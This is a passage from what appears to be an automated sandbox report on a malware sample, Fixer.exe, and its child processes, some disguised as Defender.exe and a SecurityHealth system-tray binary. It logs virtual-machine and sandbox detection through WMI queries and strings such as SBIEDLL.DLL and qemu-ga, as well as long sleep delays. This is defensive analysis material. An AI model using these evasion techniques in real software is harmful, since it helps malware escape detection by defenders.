                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Queries memory information (via WMI often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
                      Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE PNPClass = &apos;Camera&apos;
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE PNPClass = &apos;Camera&apos;
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE PNPClass = &apos;Camera&apos;
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE PNPClass = &apos;Camera&apos;
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE PNPClass = &apos;Camera&apos;
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE PNPClass = &apos;Camera&apos;
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE PNPClass = &apos;Camera&apos;
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE PNPClass = &apos;Camera&apos;
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE PNPClass = &apos;Camera&apos;
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 0000000D.00000002.52866509335.0000000002941000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000013.00000002.52877664599.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000015.00000002.52889295522.0000000002741000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000017.00000002.53431573615.0000000002E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Fixer.exeMemory allocated: 29C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeMemory allocated: 2BA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeMemory allocated: 29E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeMemory allocated: 24D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeMemory allocated: 1A7B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeMemory allocated: 1080000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeMemory allocated: 1AA80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeMemory allocated: 2680000 memory reserve | memory write watch
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeMemory allocated: 1A940000 memory reserve | memory write watch
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeMemory allocated: D30000 memory reserve | memory write watch
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeMemory allocated: 1A8D0000 memory reserve | memory write watch
                      Source: C:\Windows\System32\Defender.exeMemory allocated: E40000 memory reserve | memory write watch
                      Source: C:\Windows\System32\Defender.exeMemory allocated: 1AB00000 memory reserve | memory write watch
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeMemory allocated: CE0000 memory reserve | memory write watch
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeMemory allocated: 1A740000 memory reserve | memory write watch
                      Source: C:\Windows\System32\Defender.exeMemory allocated: 1180000 memory reserve | memory write watch
                      Source: C:\Windows\System32\Defender.exeMemory allocated: 1ABE0000 memory reserve | memory write watch
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeMemory allocated: 13C0000 memory reserve | memory write watch
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeMemory allocated: 1AE80000 memory reserve | memory write watch
                      Source: C:\Windows\System32\Defender.exeMemory allocated: 26C0000 memory reserve | memory write watch
                      Source: C:\Windows\System32\Defender.exeMemory allocated: 1A940000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 2_2_00007FFA1B3C7198 rdtsc 2_2_00007FFA1B3C7198
                      Source: C:\Users\user\Desktop\Fixer.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\Defender.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\Defender.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Fixer.exeWindow / User API: threadDelayed 9958Jump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exe TID: 7388Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe TID: 7844Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe TID: 5700Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe TID: 5396Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe TID: 2696Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\Defender.exe TID: 1076Thread sleep count: 54 > 30
                      Source: C:\Windows\System32\Defender.exe TID: 1076Thread sleep time: -35000s >= -30000s
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe TID: 5024Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\Defender.exe TID: 7328Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe TID: 5560Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\Defender.exe TID: 7104Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\Defender.exeLast function: Thread delayed
                      Source: C:\Windows\System32\Defender.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Fixer.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\Defender.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\Defender.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 0000000D.00000002.52866509335.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000013.00000002.52877664599.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000015.00000002.52889295522.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000017.00000002.53431573615.0000000003129000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qemu-g
                      Source: Defender.exe, 00000014.00000002.53603195774.000000001B756000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWM+_r
                      Source: 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 0000000D.00000002.52866509335.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000013.00000002.52877664599.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000015.00000002.52889295522.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000017.00000002.53431573615.0000000003129000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qemu-ga
                      Source: xdwdSecurityHealthSystrays.exe, 00000017.00000002.53431573615.00000000030A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: Defender.exe, 00000014.00000002.53603195774.000000001B756000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHa%SystemRoot%\system32\mswsock.dll </faultPropagationQueries>
                      Source: 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 0000000D.00000002.52866509335.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000013.00000002.52877664599.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000015.00000002.52889295522.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000017.00000002.53431573615.0000000003129000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qemu-
